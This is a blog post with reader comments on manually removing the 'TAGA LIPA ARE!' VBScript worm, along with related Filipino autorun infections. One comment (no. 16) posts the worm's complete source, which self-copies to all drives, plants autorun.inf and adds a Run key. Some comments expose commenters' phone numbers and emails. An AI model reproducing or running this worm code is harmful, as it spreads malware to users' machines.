How to Remove TAGA LIPA ARE!

I’ve been bugged by a lot of people asking me to help them remove the TAGA LIPA ARE! ‘virus’ in IE. So, I’m posting the directions here.

First thing is to get familiar with the ‘virus’. The ‘virus’ file is FS6519.dll.vbs. It’s a VB Script that does nothing except make a copy of itself in all your drives and change the title of Internet Explorer to “TAGA LIPA ARE!”.

First, configure your folders to show system, OS and hidden files and file extensions. Remove/Delete

C:\Windows\FS6519.dll.vbs

I would suggest using the Shift + Del here.

Second, open

regedit

in the run command. Remove the registry entry

HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Run/FS6519.dll

Then Remove all copies of the file

FS6519.dll.vbs

and

autorun.ini

from all your drives. Again, I suggest using Shift + Del here.

To restore the name of IE to Internet Explorer, change the value of

HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Window Title

from “TAGA LIPA ARE!” to “Internet Explorer” by double clicking the registry entry. And that’s it, the ‘virus’ is gone.

It’s really harmless and if you ask me, it looks something that an attention-seeking-twelve-year-old-with-a-compiler would do. And you, on the other hand, should know better next time. ;)

195 Responses to “How to Remove TAGA LIPA ARE!”

  1. nightfox Says:

    hehe. so may copy ka na ba nung virus? :D

  2. princess of antiquity Says:

    Nah, I still don’t have a copy. I would’ve posted the code of the script here but I don’t have a copy. I removed one for a friend last night but forgot to save a copy for myself.

    Do you have a copy? pahingi naman, oh. Hahaha.

  3. Rom Says:

    Man, lots of steps. Wouldn’t it be simpler to just load Ubuntu LiveCD and reboot your computer? Viola! No more virus! :p

  4. mark Says:

    wat ang latest antivirus?

  5. pyrox Says:

    can you make me a virus like “taga lipa are” but i want it “pyro is cute” hehehe… ^^,

  6. gigil Says:

    oh shit batangueno pa man din……buti na lang my computer has the latest and most effective antivirus stuff….I got Macafee and I haven’t had a virus for a year or so………….sosyal talaga ako

  7. Aja Says:

    A lot of my friends and classmates asked me to remove that virus off of their PCs and notebooks, too. I just searched it up on the Web, and a lot of blogs with removal instructions were available. I can’t seem to understand why they don’t think “Google” whenever a problem arises. :P

    Rom’s step(s) is (are) definitely a lot more easier. LOLx

    Oh, I have to say PC-cillin IS 2007 is the best AV suite out in the market today according to many security/tech sites. And the next one would be Zone Alarm, since there’s nothing to scan and clean for if your firewall is the best one out there blocking malicious code. I’m just frustrated they’re so expensive. ;)

  8. Presler Says:

    To those who are infected with “Taga Lipa Are” malware, here is the remover created by Leerz http://leerz25.sitesled.com/ . He really did a great job here.

    1. Download the compressed file from the author’s website http://leerz25.sitesled.com/files/tools/fixes/NOOB_KILLER.by.Leerz.zip .

    2. Unzip then run (double-click) NOOB_KILLER.by.Leerz.exe.

    3. Click AutoFix-[Kill TLA], then OK.

    4. Restart your computer.

    This application also contains the auto-fix/remover for “Hacked by Godzilla” malware.

    Cheers to all! 8)

  9. princess of antiquity Says:

    @Rom: a very good suggestion.

    @Mark & Presler: sorry, I don’t use any anti-virus that’s why I remove them manually.

    @Pyrox: if you met me earlier(high school perhaps), I would probably have said yes. ;)

    @Gigil: Mas sosyal ako ‘coz my PC is clean without anti-virus. Mas mabilis pa. :P

    @Aja: Personally, I recommend McAfee and AVG. (btw, I don’t get paid by any of them for doing this.) But like in everything else, to each his own. ;)

    If you find these steps hard to follow, I strongly recommend sir Rom’s suggestion. Or you might want to try deleting c:\windows\ altogether then tell me what happens. (I’ve always wanted to try that.) ;)

    Let’s take a leaf out of Alastor Moody’s book and practice “Constant Vigilance”! Be it virus or exploits or what have you, try not to compromise your systems. And try hard! :P

  10. Aja Says:

    AVG is good as it’s free, but it can’t detect some obvious malware from my friends’ PCs even though I’ve updated it with every required, recommended and optional update—I had to do manual removal instead. I haven’t tried McAfee, though.

    Oh, and I agree that constant vigilance is the key to better security, besides not using vulnerable apps like IE and Windows. The only reason I’m still on Windows is because of games’ compatibility. ;)

  11. Zero27 Says:

    Hi Princess Antiquity,

    You know a lot when it comes to virus removal. I’m deeply in need of your help.

    All of my drives have this cmd shell:/>. It means I can access my command prompt in any drives. I don’t want to see this cmd shell in all my drives so how do I remove it? Is it harmful to have cmd shell in all drives?

    Thanks. :)

  12. Cryptonyt Says:

    Hi To all,
    I don’t Agree that AVG is too powerfull antii-virus. yes it cleans “SOME OF VIRUSES” lol*. It’s always let me down when new virus arrives. TAGA LIPA ARE! Malware is easily remove by other anti-viruses such as Kaspersky or you may never heard ESCAN anti virus. Anyway Princess of Antiquity doing great job here.

  13. redeyes09 Says:

    ei! salamat sa instructions! galeng2! ambangis! ask q lang…taga-UP k b? hehe ala lang….

  14. Belmon Says:

    Pare patulong naman diyan sa Cavite ako nauwi Dasmarinas…Kung sinuman marunong mag alis nito….na nakaka inis na TAGA LIPA ARE! Pano bato papa service ko nalang eto nga pala cel no. ko 09159984314 patawad at nag mamadali kase ako bibili pako ng gatas hehehehehehe……

    Salamat…
    MON

  15. nightfox Says:

    aba’y andami na palang comments dito.. hahaha!

  16. nelo007 Says:

    a copy of taga lipa vb script:…

    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe FS6519.dll.vbs”
    set fs = createobject(“Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & “\FS6519.dll.vbs”)
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & “\FS6519.dll.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & “\FS6519.dll.vbs”)
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
    set tf=fs.getfile(flashdrive.path &”\FS6519.dll.vbs”)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”\FS6519.dll.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &”\FS6519.dll.vbs”)
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes=39
    end if
    next
    set rg = createobject(“WScript.Shell”)
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519″,winpath&”\FS6519.dll.vbs”
    rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”TAGA LIPA ARE!”
    if check 1 then
    Wscript.sleep 200000
    end if
    loop while check1
    set sd = createobject(“Wscript.shell”)
    sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

  17. princess of antiquity Says:

    @Aja: I’m still on windows for the same reason… although, on my part, I make the game. ;)

    @Zero27: send me the file. I have my e-mail address at my about page.

    @Cryptonyt: I recommend AVG ‘coz it’s free. ;)

    @redeyes09: I’m glad to be able to help. I have my profile here.

    @Belmon: Bro, sana nakabili ka ng gatas. Hehehe. (Bakit ba ngayon ko lang nabasa ‘to?)

    @nightfox: Hehe. Too many victims?

    @nelo007: Thanks, bro. I’ve been looking for this. :D

  18. Pauline Says:

    Princess,
    Thank you sooo much! I was surprised to see so many people had this TAGA LIPA ARE also. Your instructions to remove it were so simple and it worked!
    Salamat-po

  19. Zero27 Says:

    How would I send it? I think it has to do with my operating system version. I installed a Windoxs XP (service pack 3 build on service pack 2 by a certain programmer). When you check the drives by means of right click you could see an option like this cmd shell:/>. I solved it removing the previous OS and installing a XP service pack 2 OS.
    By the edited XP (service pack 3 build on service pack 2) has certain features such as integrated style XP, virtual drive and others.

    Which do you prefer XP service pack 2 or a edited XP (service pack 3 build on service pack 2)?

    You really amazed me with your knowledge about virus removal. More power! You really did help a lot of people. You must be a very good programmer.

    Are you also a game designer? Thanks.

  20. princess of antiquity Says:

    @Pauline: I’m glad to be able to help. :)

    @Zero27: I’ve been using Windows since I was three years old… Hehe. I recommend Linux. Haha. Although, if you really need to stay with XP, you might want to stick with XP w/ SP2 since its the most stable build of XP. I’m using Ubuntu and XP SP2 (dual boot). ;)
    I took computer graphics (CS 176) last sem and we did game dev on C# .Net platform. I guess I enjoyed it a lot that I’m still continuing it even thought the subject is already finished. :)

  21. Zero27 Says:

    Oh I see. I’m also computer fanatic actually I am currently taking up BS Information Technology at FEU – East Asia College (3rd year this coming sy). Great you’re using a LInux, you really do know a lot of different OS.

    By the way, have you tried using these products: NOD32 and Kaspersky? both are anti-virus softwares.

    They are much powerful than other anti-virus but not that easy to use. Wala lang share ko lang.

    Are you also good when it comes to hardware stuff? like tweaking up the system unit. :)

  22. princess of antiquity Says:

    I’m a Computer Science major. Although I think you already know that from my about page. :D

    have you tried using these products: NOD32 and Kaspersky? both are anti-virus softwares.

    I haven’t tried either of them but I know my friends are using Kaspersky. It worked for them so I guess it is kinda OK. (I recommend McAfee because I had experience using it in the past.)

    Are you also good when it comes to hardware stuff? like tweaking up the system unit.

    I don’t let anyone tinker with my Azrael, my pc, (hardware and software) except myself and his doctor (a trusted friend, in case I need some professional help.) :D

    While it is nice to tinker with the hardware, I love programming even more. I think it was Bill Gates who said once that without software a good machine is just a box, nothing more. ;)

  23. cathyq Says:

    i have this virus
    no idea how i got it but it IS harmful for me. its played with my keyboard… im using my sisters laptop now coz on mine i can’t even search ‘taga lipa are’ it comes up like ‘taga li331 a5w’ or something

    !!!!!!!!!!!!!!!!!!!!!!!

    ive done the instructions but still stuffed up keyboard
    the files arent there anymore but it still says taga lipa are on IE

  24. princess of antiquity Says:

    I think you have a keyboard problem. If you look at the virus code carefully, you will notice that it doesn’t mess with anything except making copies of itself on all of your drives.

    Try changing keyboards and

    To restore the name of IE to Internet Explorer, change the value of

    HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Window Title

    from “TAGA LIPA ARE!” to “Internet Explorer” by double clicking the registry entry.

  25. A ComSci Student Says:

    hmm…

    just wondering…

    pareho lng b process kpg ung kapatid nya n “Mamatay na ang mga taga-lipa” ang tatanggalin?

  26. A ComSci Student Says:

    follow up…

    e pano kung un nmng “Go Calaca Dude” ang tatanggalin?

    hehehe.

    grabe nmn… magnet ako ng mga virus…

  27. princess of antiquity Says:

    hmmm… I haven’t seen those yet. Why don’t you mail me a copy of the virus? I have my e-mail address here. :)

  28. ??? Says:

    what is Taga lipa are?

  29. pet Says:

    I have a problem same sa taga Lipa virus..DESTRUKTO!!!!!! name …autorun sya sa IE..anybocy can help me to remove this …

  30. kiddnets87 Says:

    bakit di ko makita ang FS6519.dll.vbs na file? plssssssss….help me po pls..

  31. princess of antiquity Says:

    @??? Technically, we can’t consider it a virus or a malware since it doesn’t really do anything. Just makes copy of itself on all your drives and changes the title of IE to “TAGA LIPA ARE!”.

    @pet: Try the instructions above. Use firefox! :P

    @kiddnets87: you have to configure your system to show hidden and Operating System files. :P

  32. kiddnets87 Says:

    bt po ayw pong mag show ng hidden os system files? virus po rin ba yun? makaka run po ba ng anti-virus even sa limited account?

  33. lary Says:

    could try to help i dont know to renove this virus taga lipa are if i run the editry my computer is goin to restart….and thats so…

  34. lary Says:

    regedit

  35. tina Says:

    pet?? tanung mo ung sa destrukto!!! malupit un!! hehe dami ko na nga rin nakikitang gnun e!! para xang brontok

  36. alds Says:

    prang kulang yung instruction…

    Open MSConfig and under startup, uncheck the trojan’s startup entry, [FS6519]

  37. alds Says:

    Symptoms: C: drive has an [autoplay] function when right-clicked. Internet Explorer has “TAGA LIPA ARE!” in it’s title bar.

    Mode of Transfer: USB, Fixed/Portable HDD

    Target: Internet Explorer, Registry, MSConfig, Autorun.inf

    Effects: Every Mass Storage Device linked to the infected PC will be inserted with an autorun file which will trigger the Windows Scripting Service to run its main file “FS6519.dll.vbs”, which is marked as a system file and is in the root directory of the Drive.

    Open My Computer -> Tools Menu -> Folder Options -> View Tab:

    Select: Show hidden Files and Folders

    Uncheck: Hide Extensions for known file type and Hide Protected operating system

    Click Yes Then OK.

    You will see an autorun.inf and FS6519.dll.vbs in all your harddrives. Delete ALL of them.

    If it says that something is using the program. Press Ctrl+Alt+Del and go to processes, end ALL wscript.exe

    Open MSConfig and under startup, uncheck the trojan’s startup entry, [FS6519].

    Click Start > Run and then type regedit

    delete [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519] key, and modify [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”TAGA LIPA ARE!”] key to remove the nuisance in IExplorer.

    OR go to Edit -> Find and type FS6519.dll.vbs.

    Edit the found registry by selecting the name, ryt click and modify, remove the last two strings which is wscript.exe and FS6519.dll.vbs and click OK.

    If finished, press F3 and it will search again for another, just do the same thing until nothing is found in your registry.

    If you are done with the FS6519.dll.vbs, its time for the TAGA LIPA ARE! be edited in your IE, type the string on the search again then it will show up the IE title … modify then type anything you like or better delete it.

  38. wendell Says:

    wla kung sana pinoy ang gumawa, d naman,, gaya gaya pati yang i love u bug, kung sana pinoy ang gumagawa pinapalitan lang ng pangalan nccredit tuloy satin, sana gumawa n lang tau nung orig, hnd ung ginagawa lang

  39. jumong Says:

    gusto ko sanang maka kuha ng free ativirus if ok lang sa inyo???????

  40. jumong Says:

    heeheeee ang galing naman ninyo;;;;;; ipaglaban nyo ang karapatan ninyo na maging isang dalubhasa sa pagtangal sa mga virus na iyan……. gogogogogogogo sulong kapatid tungo sa magandang bukas……

  41. chat Says:

    @alds : march 18 yung post at march 30 naman dito. So sino ang orig? Sino ang nagfefeeling magaling?

  42. RONBRONTOK Says:

    Hello there..!! If anybody out there have a problem about >>>Can not find script file “FS6519.dll.vbs”

  43. princess of antiquity Says:

    @kiddnets87: Reformat :P

    @lary: That’s weird. Reformat?

    @alds: Thanks for the additional info. This was the first time that I saw a VBS code, since I’ve never developed in VB or VBS, and I might have overlooked that. Anyway, the MSConfig entry will be ignored since there is no longer a registry entry for the vb script file. :D

    @wendell: I know who made the “I Love You” bug… ;)

    @jumong: Try Horizon DataSys ExeLockdown. It’s free! and very small in size. Libre rin ang AVG. Or better yet switch to Linux. ^_^

    @chat: this is an original. It just happened that I saw the code and felt like placing a fix here. Hindi po ako magaling at hindi rin po ako magmamagaling or nagfefeeling magaling. I have nothing to boast about since I don’t even have a degree yet. ^_^

    @RONBRONTOK: try configuring your system to show OS and hidden files. If you still can’t see it, maybe it doesn’t exist. (Good for you, then.) If the problem persists, make the switch! Use Linux. ;)

    @all: Lisensyado ba ang Windows nyo? Stop software piracy. Go open source!

    I’ve never thought that this “virus”, I don’t even want to consider this a virus, is such a big thing… This just shows the magnitude of the problem that faces the security community. As for me, I also believe that PEBKAC. Hehe. Peace!

  44. jan Says:

    hello po… bakit po di ko mabura?? sabi “it is used by another program…” what do i have to do next?? pls help me princess.. heheh.. thanks alot!! ^_^

  45. jan Says:

    pano pu yun??? ayaw niya mabura?? sabi .. it is used by another program.. what do i do next?? pls help me.. plss…

  46. Justin Says:

    Now i cant open my hard drive since it says cannot find FS6519.dll.vbs. what should i do.

  47. Justin Says:

    whoever can help me please send me a message: justin_allister@yahoo.com. thank you

  48. abbi Says:

    delete the autorun.ini

    follow the steps above. ^_^

  49. blackdiamond Says:

    Hey to ALL….

    sa lahat ng nakakaalam kong paano matanggal yong virus na “Mamatay na ang mga taga lipa! Pls. kindly send to me how to remove this virus because im one who are infected this type of virus. Plz send to me at blackdiamond122003@yahoo.com or contact me at cell no. 09058135353. Thanks and sana may response agad. Thanks uli!!!!!!!1

  50. LOISANONYMOUS Says:

    simple lang ang lahat ng virus n lumalabas… db nga ms madaling gumawa ng masama kaysa nakakabuti… :p

  51. mark venzon Says:

    madali lang taggalin yan “taga lipa are”

    manual deletion of “taga Lipa are” messege at internet explorer

    run regedit;

    HKEY_CURRENT_USER\
    Software\
    Microsoft\
    Internet Explorer\
    Main\
    Window Title

    left click once on MAIN tapos sa right side ng windows, right

    click and delete “WINDOW TITLE”

    taga calaca me, batangueno. ano kaya susunod na virus

  52. mark venzon Says:

    pwede rin gamitin ang “system restore”

    restore the set-up of ur computer sa date bago lumabas ang virus.

    just e-mail me or txt 09196473616 if my problem

  53. Reggie Says:

    i’ve encountered a virus that disables antivirus softwares, disables ctrl+alt+del, and also disables CMD.. nid sum help hir plz.. asap.. tnx so much

  54. xhjyfm Says:

    Hello! Thank you for your site. I have found here much useful information.
    Good luck.

  55. Rexon Says:

    why di ko makita yung FS6519.dll.vbs sa windows? paano ko ba tatanggalin kahit na di ko nararamdaman kung anong effect eh naiinis lang akong makita yung pangalan…

  56. vulva_licker Says:

    my remover na ba para sa TAGA LIPA ARE! ? enge naman ako…

  57. Lipaners Says:

    Princess,

    hmm, i’d presume your a guy even if your name suggests your a sissy.

    hehe well I like the idea you’re helping people (you’re selling like pancakes man!), but i guess you shouldn’t overdo it. Its not so so cool.

    ah, sabi mo pala:

    “Technically, we can’t consider it a virus or a malware since it doesn’t really do anything. JUST MAKES COPY OF ITSELF on all your drives and changes the title of IE to “TAGA LIPA ARE!”…”

    Well, what can i say. Technically eh? Why don’t you check GOOGLE as you’ve said (when problems arise) and check your definition of a virus. If it replicates, even in the absence of a “payload”, it is “TECHNICALLY”, a virus.

    and sabi mo pala kay gigil, mas “sosyal pc mo kc walang antivirus pero ‘clean’ “. … well good luck to you and to all those who believed that their box is safe without any AV. Like saying they shouldn’t put padlocks into their gates if they’ve got a friendly neighborhood.

    Think again.

    As for you people, beware of ‘mind viruses’… Coz its worse and it makes you more stewpid.

    Thanks.

  58. Lipaners Says:

    nga pala, ive read taga mapua daw gumawa nun OR probably STI lipa daw. Im from mapua. but personally i think nagpapansin lng cla.

    halatang iisang party may gawa ng virus and they’re also the ones who released the fix by a guy under the handle leerz.

    bringing the bad thing about, and claim to have the cure.

    just a thought.

  59. mark Says:

    ei, can u help me….?
    when i open my computer, before my computer show my desktop, there’s a message that says ” i’m still waiting for the strawberry coming in my baguio, please help me…” something like that… as of now, i don’t see any problem on my computer except that it makes all my drive in autoplay….. tnx :)

  60. mark Says:

    dami mgagaling d2..

    @lipaners: yaan mo na c princess.. nkakatulong naman sha… hehehe…

    @princess of antiquity: pls, help me.. tnx..

    kakahiya s inyo,, ang gagaling nu, d me mkarelate s mga usapan ng iba,,, hehehe……

  61. Maricel Says:

    thank you so much! this was really helpful to me. it came in handy when i needed it most :D

  62. me Says:

    i cant delete the vbs file and the autorun.inf…it says it is corrupted…what do i do?

  63. nico Says:

    how do you delete a corrupted and unreadable vbs and inf file from your USB?

  64. bob Says:

    pano tanggalin yung virus na nasa hardrive without having to reformat? corrupted yung vbs and autorun e

  65. Lipaners Says:

    lipat mo ang mga files mo sa hdd mo.. juz make sure u dnt include the vbs and autorun.ini files… then format ur flash disk… its the easiest and most unlikely to fail.

  66. Charlie Says:

    “Im still waiting for the strawberry coming from my baguio.. pls help me”

    This is the message I receive everytime I open my computer..

    can u pls Help me???

  67. tjbmx Says:

    hi! =] pede po bang malaman kung saan ko mahhanap ung 1st step? hindi kasi ako maka relate eh..newbie kasi ako sa comp… thaks =]

  68. tjbmx Says:

    kasi po natangal ko na ung taga lipa are..sa internet explorer. pero ung virus na tga lipa are hidi ko matangal? ano po bang key word ng i rurun ko at steps? thank you po =]

  69. ferdie Says:

    pano ba tanggalin ang “I’m still waiting for the strawberry coming from my baguio.. please help me” tnx

  70. timothy23 Says:

    Is it true? that McAfee is gooder than AVG? coz im using AVG now..

  71. timothy23 Says:

    bakit wala akong makitang “autorun.inf and FS6519.dll.vbs” sa Pc ko? my nakita akong lumabas madaming kakaibang mga title nila collor red ang dami..binura ko na.. hayyy autorun.inf and FS6519.dll.vbs ang hirap mahanap..

    help po =c

  72. timothy23 Says:

    wahahahahah tama si lapaners..pc w/av is complicated..hmmm siguro wala xang internet? joke..

  73. sarah Says:

    Hi!

    Please help me po…. how can i remove “I’m still waiting for the strawberry coming from my baguio.. pls. help!”.

    Gracias!

    :)

  74. timothy23 Says:

    It is true that AOL is better than Bitdepender Anti virus?

  75. timothy23 Says:

    is it..rader ^^

  76. Kettelkorn Says:

    parehas kami ng problema ni sarah saka kay marc yung:
    ____________________________________
    |PROMISE!_________________________|X|
    | |
    |I’m still waiting for the strawberry coming| |from my baguio.. pls. help!’… |
    |___________________________________|

    lumalabas to sa startup eh

    nag search ako sa google nakalagay “worm”
    pangalan:W32/Vizim worm

    gamit kong antivirus ngayun ay yung
    “Eset NOD32″ -Kaya Ba Nito matangal yun?
    pls help……di ako magalaing sa ganitong problema eh
    Parang Bago Lng toh…… konti plang nakikita ko eh

    paki e-mail na lang o PM sa messenger kung paano santos_ephraim@yahoo.com tnx po

  77. Kettelkorn Says:

    Medyu nasira yung itsura sa unag comment ko hehe sna maintindihan mo….

  78. ERIKA DY Says:

    helo pu…bkt ayaw gumana sa spc ko ung NOOB killer,, NOT VALID DAW SA WIN32 APPLICATION.
    need reply here…asap. tnx. email nyu nlng ako

  79. siong_cj Says:

    panu po b ttngglin ung worm.vbs.solow.a….d sya madisinfected ng kaspersky???
    help nmn po… thnx po….

    cj

  80. timothy23 Says:

    bakit ganun?na tangal ko na lahat kung pano maalis ung “TAGA LIPA ARE!” pero ung folder sa desktop ko dko parin maalis parating sinasabi na my gumagamit eh close na lahat siguro d na ito taga lipa are..hmmm ksi ung mga icons sa “ADD and Remove ko kumonte ang maganda nito reformat na yata ehehehe! help po?

  81. timothy23 Says:

    ito nga pla ung alam kong magandang gamiting anti virus..
    “AOL, AVG, Bitdefender” yn lang po eh..

  82. mark Says:

    ala pa rin po ba remover nung i’m still waiting for my strawberry coming from my baguio?… kala ko me lang meron nun… pls help, princess

  83. mark Says:

    pls help princess of antiquity or lipaners

  84. timothy23 Says:

    mas magandang gawin sa pcm o tol reformat..ako reformat nalng ginawa ko nakakatamd mag manual remove eh hehehe!

  85. LRZ Says:

    [b]For all those getting the File Corrupted error for the FIx[/b]
    – I’ve had server problems during the Uploading, however, I have
    4 other copies pointing to the same file, eitherway, it should still work,

    anywhow, the link has been fixed (weeks back) so, will likely be ‘OK’ now.
    Please do report if anything similar comes up!

    [b]how do you delete a corrupted and unreadable vbs and inf file from your USB?[/b]
    is your Flash Drive on ‘Write-Protect’?
    try to enable writing first. :)

    [b]
    It is true that AOL is better than Bitdepender Anti virus?[/b]

    AOL, is running on ‘Kaspersky’ Antivirus, Comparing them, I have no idea, both are Good AV’s.

    I highly suggest NOD32 it has the lowest memory footprint (use),

    [b]mas magandang gawin sa pcm o tol reformat..ako reformat nalng ginawa ko nakakatamd mag manual remove eh hehehe![/b]
    Standard Reformat time is around 30minutes to 1 hour, however, reinstalling common programs that you have previously installed, well, that might take longer.

    Manual cleanup from an average user will take around 2-10 minutes! (or just a few seconds with the Noob Killer)

    [b]ala pa rin po ba remover nung i’m still waiting for my strawberry coming from my baguio?… kala ko me lang meron nun… pls help, princess[/b]

    I’m actually still probing about this, I haven’t yet seen any file associated with it, any possible VBS name? or registry entries, if that could be sorted, everything else will follow!

    [b]helo pu…bkt ayaw gumana sa spc ko ung NOOB killer,, NOT VALID DAW SA WIN32 APPLICATION.[/b]
    what OS are you running Sir/Mam, Noob Killer has been tested under XP(all,NT), Win9x(ME,SE). Please Download the link again, or if that fails, you can always the the manual cleaning. =)

    [b]halatang iisang party may gawa ng virus and they’re also the ones who released the fix by a guy under the handle leerz.
    bringing the bad thing about, and claim to have the cure.
    just a thought.[/b]

    Int’resting :) , nope sir/mam, I am from Bulacan, and I have, in by any means connection with those guys (whoever they are) *or even there’s just one person behind it*

    In my theory, the operated in packs, spreading it on various places to help spread their little concotion’

    I’ve had a couple of run-ins with them from the past, *even divulged into word fights*.

    if you need details on where these things originated *word fights*
    you can read the discussions on these pages.

    http://www.convergenceforums.net/e107_plugins/forum/forum_viewtopic.php?11735
    http://www.convergenceforums.net/e107_plugins/forum/forum_viewtopic.php?10325

  86. LRZ Says:

    *I dont have, by any means ‘any’ connection with those guys (whoever they are) *or even there’s just one person behind it*

  87. Kanuto Says:

    Ala ay kagaling ng website na are. Kawasa galit ang ang programmer sa mga taga lipa eh, di ga.

  88. mark Says:

    format doesn’t help me, .. i’ve done it but still nothing happens

  89. LRZ Says:

    @Kanuto, not the residents of LIPA, but those merely those who did this anoyance ;)

    @Mark, format doesn’t help me, .. i’ve done it but still nothing happens, perhaps your Flashdrive is infected, mp3, mp4, and external hard disk is infected, please PLUG all possible infected MEDIA, then run the fix again!

    Thanks!

    -Leerz

  90. Jun Lao Says:

    I also have Promise- I left my strawberies,

    1. I had my IT reformat my pc, it was gone for 1 week

    2. Obviously, it has resurfaced- where the F*ck / sites propagate this

    3. How Do I remove this- Plain English please, step 1, 2, 3, 4, 5

    4. Will give P500 to someone who can help me here, 09209128531 so i know where I can PAY!

    I hope the sh*thead mother fuc**er who made the virus gets injected with the aids virus to pay for all the lost time he cost people…

  91. timothy23 Says:

    Nice! Jun Lao..Hmmm..Try to find a Good Comtech not IT..

  92. timothy23 Says:

    Me also.. I have a big problem w/my f..k’n pc.. ahihi! HMMMMM.. Nice virus!huh?! Its so lovely ! !

  93. timothy23 Says:

    HMMM is someone exprnced. When deliting Autrorun.inf and FS6519.dll.vbs in hdd..and nothing changed?and evrytime i try to delit some folder it always say “u canot del this coz some one is using it?” but wen im looking in end task nothings runing?..Is that means..i missed some of it? But i followed the instruction . But i only erase 1 of Autrorun.inf in my hdd.then no more..hmm i showed all hidden files but nothing shows..so i cant erase the virus manualy..hope some one can teach me how to explore and find it? thank’s pls mail me for some info..tj_bmx2003@yahoo.com ^_~ muah!

  94. Jun Lao Says:

    Welcome Guest. Login or register here
    Topic: Baguio Strawberry Virus
    Message posted by nrdvjr on 15 May 2007 at 10:46pm – IP Logged

    nrdvjr
    pcx newbie

    14 December 2005

    Pls help! how do i remove this message? it keeps on appearing everytime my system startup. I used Hijackthis but it keeps on coming back. My NOD32 antivirus didnt detect it as virus(My virus database is 05152007).

    thanks

    “I’m still waiting for the strawberry coming from Baguio! Pls. Help!”

    Message posted by malaka on 16 May 2007 at 9:51am – IP Logged

    malaka

    pcx newbie

    Philippines
    20 September 2005

    try any online free virus scanner from mcafee, housecall from trendmicro, or download avg7.5 antivirus free edition, bitdefender 8 free edition… try to remove it with anti-spyware/anti-malware…
    (i have not encountered it so i dont know the exact antidote to it..)

    —————–
    “Natutulog ba ang Diyos?”
    “May mga Aliens ba sa Mars?”
    “Totoong nasusunog ba ang fart kapag sinindihan?
    Shengton s Innovative PC Forums

    Message posted by nrdvjr on 17 May 2007 at 12:42am – IP Logged

    nrdvjr
    pcx newbie

    14 December 2005

    it behaves like taga lipa are. it generate autorun.inf and iexplore.exe on every drive. including usb.

    also it is on the memory. cannot just delete those files. keeps on coming back.

    i have already run online scan by bitdefender. yes it detect it as worm32.worm.vb.gg. my problem is andun pa rin yung message everytime my system starts. plus yung ibang pc dito sa office na offline are also infected kaya keeps on returning on my pc thru usb…

    anyway thanks malaka!

    Message posted by malaka on 17 May 2007 at 11:04am – IP Logged

    malaka

    pcx newbie

    Philippines
    20 September 2005

    if it behaves like TGA, then use the anti-TGA… boot in safe mode and remove it…

    —————–
    “Natutulog ba ang Diyos?”
    “May mga Aliens ba sa Mars?”
    “Totoong nasusunog ba ang fart kapag sinindihan?
    Shengton s Innovative PC Forums

    Message posted by SHENGTON on 21 May 2007 at 9:52pm – IP Logged

    SHENGTON

    pcx newbie

    Philippines
    13 December 2006

    You mean if you open a drive C: or drive D: you getting an error message?

    The error message is like this?

    Cannot open drive [letter]autorun.vbs is missing

    Is that the error that keeps on prompting to you?

    If that then you need to download this anti-spyware and anti-virus: Spyware Terminator

    Then you need also 1 computer co’z we can only remove this virus Win32: Sality through networking. If you don’t have other computer there then the only way is to reformat your hard disk then install again the OS.

    That’s why I suggest to download the Spyware Terminator because this software who can only remove this virus. We need to delete the autorun.vbs and the autorun.bat.

    —————–
    Shengton s PC Forums

    Message posted by nrdvjr on 25 May 2007 at 3:54am – IP Logged

    nrdvjr
    pcx newbie

    14 December 2005

    I have already remove the virus last night. i used kaspersky. pero pag binuksan ko yung drive c ko, hinahanap nya yung virus file na nadelete na. which is “exiplorer.exe”. Tapos naiwan na yung message na “I’m still waiting for the strawberry coming from myguio! Pls. Help!” everytime na naglolog-on ako. How can I remove?

    BTW, the name of the virus Virus.Win32.AutoRun.m

    Message posted by SHENGTON on 25 May 2007 at 11:17am – IP Logged

    SHENGTON

    pcx newbie

    Philippines
    13 December 2006

    W32/Vizim.worm or Virus.Win32.AutoRun.m

    W32/Vizim-A is a worm for the Windows platform.

    Worms infect computers, but do not infect files. They can simply be identified and deleted. However, they often make registry or startup file changes so that they are executed on boot-up.

    When first run W32/Vizim-A copies itself to the root and Windows system folders and creates the following files:

    \autorun.inf
    \autorun.inf

    The file autorun.inf is designed to start the worm once the removeable drive is connected to a uninfected computer. The file autorun.inf can be safely deleted.

    Registry entries are set as follows:

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    LegalNoticeCaption
    PROMISE???

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    LegalNoticeText
    I am still waiting for the strawberry coming from my Baguio! Pls.. Help!

    Here how to remove this virus nrdvjr: Click Me nrdvjr

    all these doesnt work, fyi

  95. Zero27 Says:

    this one is new and odd. Inside the your flash drive are two hidden files and data such as autorun.inf and recycler folder containing the file RECYCLER\S-1-5-21-1078073611-1993962763-839522115-1003
